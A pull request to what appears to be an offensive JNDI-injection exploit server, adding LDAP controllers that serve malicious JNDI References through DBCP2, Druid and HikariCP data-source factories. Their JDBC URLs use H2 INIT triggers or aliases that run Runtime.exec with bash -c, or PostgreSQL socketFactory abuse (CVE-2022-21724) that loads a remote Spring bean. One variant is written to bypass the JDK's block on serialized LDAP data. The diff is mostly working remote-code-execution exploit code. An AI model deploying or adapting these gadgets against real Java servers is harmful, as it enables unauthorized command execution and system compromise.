### PR TITLE
Adding JNDI gadgets based on JDBC connection pooling classes.

### DIFF
--- a/README.md
+++ b/README.md
@@ -70,6 +70,7 @@ Mapping ldap://192.168.1.10:1389/o=dbcp2-h2 to artsploit.controllers.Dbcp2H2
 Mapping ldap://192.168.1.10:1389/o=druid-h2 to artsploit.controllers.DruidH2
 Mapping ldap://192.168.1.10:1389/o=dbcp2-postgresql to artsploit.controllers.Dbcp2Postgresql
 Mapping ldap://192.168.1.10:1389/o=hikaricp-h2 to artsploit.controllers.HikariCPH2
+Mapping ldap://192.168.1.10:1389/o=hikaricp-h2-local-factory to artsploit.controllers.HikariCPH2LocalFactory
 ```
 
 ### Building

--- a/README.md
+++ b/README.md
@@ -19,6 +19,10 @@ In addition to the known JNDI attack methods(via remote classloading in referenc
 * [Groovy.java](/src/main/java/artsploit/controllers/Groovy.java) - leads to RCE via unsafe reflection in **org.apache.naming.factory.BeanFactory** + **groovy.lang.GroovyShell**
 * [WebSphere1.java](/src/main/java/artsploit/controllers/WebSphere1.java) - leads to OOB XXE in **com.ibm.ws.webservices.engine.client.ServiceFactory**
 * [WebSphere2.java](/src/main/java/artsploit/controllers/WebSphere2.java) - leads to RCE via classpath manipulation in **com.ibm.ws.client.applicationclient.ClientJ2CCFFactory**
+* [Dbcp2H2.java](src/main/java/artsploit/controllers/Dbcp2H2.java) - leads to RCE by abusing JDBC connection string to an H2 DB via **org.apache.tomcat.dbcp.dbcp2.BasicDataSourceFactory**
+* [Dbcp2Postgresql.java](src/main/java/artsploit/controllers/Dbcp2Postgresql.java) - leads to RCE by abusing JDBC connection string to PostgreSQL DB via **org.apache.tomcat.dbcp.dbcp2.BasicDataSourceFactory**
+* [DruidH2.java](src/main/java/artsploit/controllers/DruidH2.java) - leads to RCE by abusing JDBC connection string to H2 DB via **com.alibaba.druid.pool.DruidDataSourceFactory**
+* [HikariCPH2.java](src/main/java/artsploit/controllers/HikariCPH2.java) - leads to RCE by abusing JDBC connection string to H2 DB via **com.zaxxer.hikari.HikariJNDIFactory**
 
 ### Usage
 ```
@@ -62,6 +66,10 @@ Mapping ldap://192.168.1.10:1389/o=websphere1 to artsploit.controllers.WebSphere
 Mapping ldap://192.168.1.10:1389/o=websphere1,wsdl=* to artsploit.controllers.WebSphere1
 Mapping ldap://192.168.1.10:1389/o=websphere2 to artsploit.controllers.WebSphere2
 Mapping ldap://192.168.1.10:1389/o=websphere2,jar=* to artsploit.controllers.WebSphere2
+Mapping ldap://192.168.1.10:1389/o=dbcp2-h2 to artsploit.controllers.Dbcp2H2
+Mapping ldap://192.168.1.10:1389/o=druid-h2 to artsploit.controllers.DruidH2
+Mapping ldap://192.168.1.10:1389/o=dbcp2-postgresql to artsploit.controllers.Dbcp2Postgresql
+Mapping ldap://192.168.1.10:1389/o=hikaricp-h2 to artsploit.controllers.HikariCPH2
 ```
 
 ### Building

--- a/src/main/java/artsploit/Config.java
+++ b/src/main/java/artsploit/Config.java
@@ -10,7 +10,7 @@ import java.net.UnknownHostException;
 public class Config {
 
     @Parameter(names = {"-c", "--command"}, description = "Command to execute on the target server", order = 0)
-    public static String command = "/Applications/Calculator.app/Contents/MacOS/Calculator";
+    public static String command = "xcalc";
 
     @Parameter(names = {"-n", "--hostname"}, description = "Local HTTP server hostname " +
             "(required for remote classloading and websphere payloads)", order = 1)

--- a/src/main/java/artsploit/controllers/Dbcp2H2.java
+++ b/src/main/java/artsploit/controllers/Dbcp2H2.java
@@ -1,0 +1,65 @@
+package artsploit.controllers;
+
+import artsploit.Config;
+import artsploit.annotations.LdapMapping;
+import com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult;
+import com.unboundid.ldap.sdk.Entry;
+import com.unboundid.ldap.sdk.LDAPResult;
+import com.unboundid.ldap.sdk.ResultCode;
+
+import javax.naming.Reference;
+import javax.naming.StringRefAddr;
+
+import static artsploit.Utilities.serialize;
+
+/**
+ * Yields:
+ * RCE by controlling the JDBC URL (connection string) of Tomcat DBCP2 BasicDataSourceFactory class.
+ * BasicDataSourceFactory provides an implementation of javax.naming.ObjectFactory that can be used to instantiate a data source
+ * and the connection string is controllable via the url attribute.
+ * JDBC connection string for an H2 database provides an INIT parameter that can be used to execute an SQL statement.
+ * The CREATE TRIGGER statement of the H2 db, supports Javascript code inside the trigger body. So by creating a JDBC
+ * connection string to an H2 DB with the INIT parameter set to a CREATE TRIGGER statement containing JS code in the body
+ * an RCE can be triggered.
+ *
+ * @see 
+ *     https://www.veracode.com/blog/research/exploiting-jndi-injections-java
+ *     https://b1ue.cn/archives/529.html
+ * 
+ * Requires:
+ *  Tomcat DBCP2 and H2 in classpath
+ *
+ *  Verified on:
+ *  - org.apache.tomcat.embed:tomcat-embed-core:8.5.61
+ *  - com.h2database:h2:2.1.214
+ *
+ * @author snowyowl
+ */
+
+@LdapMapping(uri = {"/o=dbcp2-h2"})
+public class Dbcp2H2 implements LdapController {
+
+    public void sendResult(InMemoryInterceptedSearchResult result, String base) throws Exception {
+
+        System.out.println("Sending LDAP ResourceRef result for " + base + " with tomcat-dbcp2-h2-sql payload");
+
+        Entry e = new Entry(base);
+        e.addAttribute("javaClassName", "java.lang.String"); //could be any
+
+        String javascript = "//javascript\njava.lang.Runtime.getRuntime().exec(['bash', '-c', '"+ Config.command + "'])";
+        String url = "jdbc:h2:mem:test;MODE=MSSQLServer;" +
+                "init=CREATE TRIGGER cmdExec BEFORE SELECT ON INFORMATION_SCHEMA.USERS AS $$" +
+                javascript + " $$";
+
+        Reference ref = new Reference("javax.sql.DataSource", "org.apache.tomcat.dbcp.dbcp2.BasicDataSourceFactory", null);
+        ref.add(new StringRefAddr("driverClassName", "org.h2.Driver"));
+        ref.add(new StringRefAddr("url", url));
+        ref.add(new StringRefAddr("username", "root"));
+        ref.add(new StringRefAddr("password", "password"));
+        ref.add(new StringRefAddr("initialSize", "1"));
+        e.addAttribute("javaSerializedData", serialize(ref));
+
+        result.sendSearchEntry(e);
+        result.setResult(new LDAPResult(0, ResultCode.SUCCESS));
+    }
+}

--- a/src/main/java/artsploit/controllers/Dbcp2Postgresql.java
+++ b/src/main/java/artsploit/controllers/Dbcp2Postgresql.java
@@ -1,0 +1,67 @@
+package artsploit.controllers;
+
+import artsploit.Config;
+import artsploit.annotations.LdapMapping;
+import com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult;
+import com.unboundid.ldap.sdk.Entry;
+import com.unboundid.ldap.sdk.LDAPResult;
+import com.unboundid.ldap.sdk.ResultCode;
+
+import javax.naming.Reference;
+import javax.naming.StringRefAddr;
+
+import static artsploit.Utilities.serialize;
+
+/**
+ * Yields:
+ * RCE via JDBC connection to a vulnerable Postgresql DB impacted by CVE-2022-21724.
+ * A database connection can be triggered by using the BasicDataSourceFactory of Tomcat's DBCP2 and
+ * the connection string of this class along with the JDBC driver can
+ * be controlled. So by specifying an arbitrary socketFactory class along with a single parameter
+ * socketFactoryArg in the JDBC connection string a class with a single argument public constructor
+ * can be instantiated. ClassPathXmlApplicationContext provides a single argument public constructor
+ * that can pointed to a remote XML file with the definition of a malicious spring bean there by triggering an RCE
+ *
+ * @see:
+ *      https://www.veracode.com/blog/research/exploiting-jndi-injections-java
+ *      https://b1ue.cn/archives/529.html 
+ *
+ * Input:
+ *    Config.command = URL that provides a bean to be consumed by ClassPathXmlApplicationContext  "http://0.0.0.0:7800/bean.xml"
+ *
+ * Requires:
+ *  Tomcat DBCP2, Spring and postgresql in classpath
+ *
+ *  Verified on:
+ *  - org.apache.tomcat.embed:tomcat-embed-core:8.5.61
+ *  - org.postgresql:postgresql:42.3.1
+ *  - org.springframework:spring-context:5.3.21
+ *
+ * @author snowyowl
+ */
+
+@LdapMapping(uri = {"/o=dbcp2-postgresql"})
+public class Dbcp2Postgresql implements LdapController {
+
+    public void sendResult(InMemoryInterceptedSearchResult result, String base) throws Exception {
+
+        System.out.println("Sending LDAP ResourceRef result for " + base + " with tomcat-dbcp2-postgres-sql payload");
+
+        Entry e = new Entry(base);
+        e.addAttribute("javaClassName", "java.lang.String"); //could be any
+
+        // works only on versions affected by CVE-2022-21724.
+         String url = "jdbc:postgresql://localhost:5432/testdb?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=" + Config.command;
+
+        Reference ref = new Reference("javax.sql.DataSource", "org.apache.tomcat.dbcp.dbcp2.BasicDataSourceFactory", null);
+        ref.add(new StringRefAddr("driverClassName", "org.postgresql.Driver"));
+        ref.add(new StringRefAddr("url", url));
+        ref.add(new StringRefAddr("username", "root"));
+        ref.add(new StringRefAddr("password", "password"));
+        ref.add(new StringRefAddr("initialSize", "1"));
+        e.addAttribute("javaSerializedData", serialize(ref));
+
+        result.sendSearchEntry(e);
+        result.setResult(new LDAPResult(0, ResultCode.SUCCESS));
+    }
+}

--- a/src/main/java/artsploit/controllers/DruidH2.java
+++ b/src/main/java/artsploit/controllers/DruidH2.java
@@ -1,0 +1,65 @@
+package artsploit.controllers;
+
+import artsploit.Config;
+import artsploit.annotations.LdapMapping;
+import com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult;
+import com.unboundid.ldap.sdk.Entry;
+import com.unboundid.ldap.sdk.LDAPResult;
+import com.unboundid.ldap.sdk.ResultCode;
+
+import javax.naming.Reference;
+import javax.naming.StringRefAddr;
+
+import static artsploit.Utilities.serialize;
+
+/**
+ * RCE by controlling the JDBC URL (connection string) of DruidDataSourceFactory.
+ * DruidDataSourceFactory provides an implementation of javax.naming.ObjectFactory that can be used to instantiate a data source
+ * and the connection string is controllable via the url attribute.
+ * JDBC connection string for an H2 database provides an INIT parameter that can be used to execute an SQL statement.
+ * The CREATE TRIGGER statement of the H2 db, supports Javascript code inside the trigger body. So by creating a JDBC
+ * connection string to an H2 DB with the INIT parameter set to a CREATE TRIGGER statement containing JS code in the body
+ * an RCE can be triggered.
+ *
+ * @see:
+ *      https://www.veracode.com/blog/research/exploiting-jndi-injections-java
+ *      https://b1ue.cn/archives/529.html 
+ *
+ * Requires:
+ *  Druid and H2 in classpath
+ *
+ *  Verified On:
+ *  - com.alibaba:druid:1.0.15
+ *  - com.h2database:h2:2.1.214
+ *
+ * @author snowyowl
+ */
+
+@LdapMapping(uri = {"/o=druid-h2"})
+public class DruidH2 implements LdapController {
+
+    public void sendResult(InMemoryInterceptedSearchResult result, String base) throws Exception {
+
+        System.out.println("Sending LDAP ResourceRef result for " + base + " with druid-h2-sql payload");
+
+        Entry e = new Entry(base);
+        e.addAttribute("javaClassName", "java.lang.String"); //could be any
+
+        String javascript = "//javascript\njava.lang.Runtime.getRuntime().exec(['bash', '-c', '"+ Config.command + "'])";
+        String url = "jdbc:h2:mem:test;MODE=MSSQLServer;" +
+                "init=CREATE TRIGGER cmdExec BEFORE SELECT ON INFORMATION_SCHEMA.USERS AS $$" +
+                javascript + " $$";
+
+        Reference ref = new Reference("javax.sql.DataSource", "com.alibaba.druid.pool.DruidDataSourceFactory", null);
+        ref.add(new StringRefAddr("driverClassName", "org.h2.Driver"));
+        ref.add(new StringRefAddr("url", url));
+        ref.add(new StringRefAddr("username", "root"));
+        ref.add(new StringRefAddr("password", "password"));
+        ref.add(new StringRefAddr("initialSize", "1"));
+        ref.add(new StringRefAddr("init", "true"));
+        e.addAttribute("javaSerializedData", serialize(ref));
+
+        result.sendSearchEntry(e);
+        result.setResult(new LDAPResult(0, ResultCode.SUCCESS));
+    }
+}

--- a/src/main/java/artsploit/controllers/HikariCPH2.java
+++ b/src/main/java/artsploit/controllers/HikariCPH2.java
@@ -1,0 +1,65 @@
+package artsploit.controllers;
+
+import artsploit.Config;
+import artsploit.annotations.LdapMapping;
+import com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult;
+import com.unboundid.ldap.sdk.Entry;
+import com.unboundid.ldap.sdk.LDAPResult;
+import com.unboundid.ldap.sdk.ResultCode;
+
+import javax.naming.Reference;
+import javax.naming.StringRefAddr;
+
+import static artsploit.Utilities.serialize;
+
+/**
+ * RCE by controlling the JDBC URL (connection string) of HikariJNDIFactory.
+ * HikariJNDIFactory provides an implementation of javax.naming.ObjectFactory that can be used to instantiate a data source
+ * and the connection string is controllable via the jdbcUrl attribute.
+ * JDBC connection string for an H2 database provides an INIT parameter that can be used to execute an SQL statement.
+ * The CREATE TRIGGER statement of the H2 db, supports Javascript code inside the trigger body. So by creating a JDBC
+ * connection string to an H2 DB with the INIT parameter set to a CREATE TRIGGER statement containing JS code in the body
+ * an RCE can be triggered.
+ *
+ * @see:
+ *      https://www.veracode.com/blog/research/exploiting-jndi-injections-java
+ *      https://b1ue.cn/archives/529.html 
+ *
+ * Requires:
+ *  HikariCP and H2 in classpath
+ *
+ *  Verified On:
+ *  - com.zaxxer:HikariCP:4.0.3
+ *  - com.h2database:h2:2.1.214
+ *
+ * @author snowyowl
+ */
+
+@LdapMapping(uri = {"/o=hikaricp-h2"})
+public class HikariCPH2 implements LdapController {
+
+
+    public void sendResult(InMemoryInterceptedSearchResult result, String base) throws Exception {
+
+        System.out.println("Sending LDAP ResourceRef result for " + base + " with hikaricp-h2-sql payload");
+
+        Entry e = new Entry(base);
+        e.addAttribute("javaClassName", "java.lang.String"); //could be any
+
+        String javascript = "//javascript\njava.lang.Runtime.getRuntime().exec(['bash', '-c', '"+ Config.command + "'])";
+        String url = "jdbc:h2:mem:test;MODE=MSSQLServer;" +
+                "init=CREATE TRIGGER cmdExec BEFORE SELECT ON INFORMATION_SCHEMA.USERS AS $$" +
+                javascript + " $$";
+
+        Reference ref = new Reference("javax.sql.DataSource", "com.zaxxer.hikari.HikariJNDIFactory", null);
+        ref.add(new StringRefAddr("driverClassName", "org.h2.Driver"));
+        ref.add(new StringRefAddr("jdbcUrl", url));
+        ref.add(new StringRefAddr("username", "root"));
+        ref.add(new StringRefAddr("password", "password"));
+        ref.add(new StringRefAddr("initialSize", "1"));
+        e.addAttribute("javaSerializedData", serialize(ref));
+
+        result.sendSearchEntry(e);
+        result.setResult(new LDAPResult(0, ResultCode.SUCCESS));
+    }
+}

--- a/src/main/java/artsploit/controllers/HikariCPH2LocalFactory.java
+++ b/src/main/java/artsploit/controllers/HikariCPH2LocalFactory.java
@@ -1,0 +1,63 @@
+package artsploit.controllers;
+
+import artsploit.Config;
+import artsploit.annotations.LdapMapping;
+import com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult;
+import com.unboundid.ldap.sdk.Entry;
+import com.unboundid.ldap.sdk.LDAPResult;
+import com.unboundid.ldap.sdk.ResultCode;
+
+/**
+ * RCE by controlling the JDBC URL (connection string) of HikariJNDIFactory.
+ * This version uses a Reference with the factory class name directly in the LDAP entry
+ * rather than serialized data which is blocked by default in recent JDK versions.
+
+ * Uses the same H2 SQL injection technique as HikariCPH2 but works with
+ * newer JDK versions where com.sun.jndi.ldap.object.trustSerialData=false
+
+ * Requires:
+ *  HikariCP and H2 in classpath
+
+ * Verified On:
+ *  - com.zaxxer:HikariCP:4.0.3
+ *  - com.h2database:h2:2.1.214
+ */
+
+@LdapMapping(uri = {"/o=hikaricp-h2-local-factory"})
+public class HikariCPH2LocalFactory implements LdapController {
+
+    public void sendResult(InMemoryInterceptedSearchResult result, String base) throws Exception {
+
+        System.out.println("Sending LDAP Reference result for " + base + " with hikaricp-h2-ref payload");
+
+        Entry e = new Entry(base);
+
+        // Set the object class to create a Reference
+        e.addAttribute("objectClass", "javaNamingReference");
+
+        // Set the Java class name to load
+        e.addAttribute("javaClassName", "javax.sql.DataSource");
+
+        // Specify the factory class directly
+        e.addAttribute("javaFactory", "com.zaxxer.hikari.HikariJNDIFactory");
+
+        // The H2 JDBC URL with embedded code execution
+        String url = "jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;INIT=CREATE ALIAS EXEC AS " +
+                "'String shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(cmd)\\;" +
+                "return \"test\"\\;}'\\;CALL EXEC('" + Config.command + "')";
+
+        System.out.println("[DEBUG] Created JDBC URL: " + url);
+
+        // Format should be exactly: "#[index]#[type]#[content]"
+        // This matches what Java's LDAP reference parser expects
+        e.addAttribute("javaReferenceAddress", "#0#jdbcUrl#" + url);
+        e.addAttribute("javaReferenceAddress", "#1#driverClassName#org.h2.Driver");
+        e.addAttribute("javaReferenceAddress", "#2#username#root");
+        e.addAttribute("javaReferenceAddress", "#3#password#password");
+        e.addAttribute("javaReferenceAddress", "#4#autoCommit#true");
+        e.addAttribute("javaReferenceAddress", "#5#maximumPoolSize#1");
+
+        result.sendSearchEntry(e);
+        result.setResult(new LDAPResult(0, ResultCode.SUCCESS));
+    }
+}


### PR DESCRIPTION
These gadgets trigger an RCE by abusing the JDBC connection string to a vulnerable DB.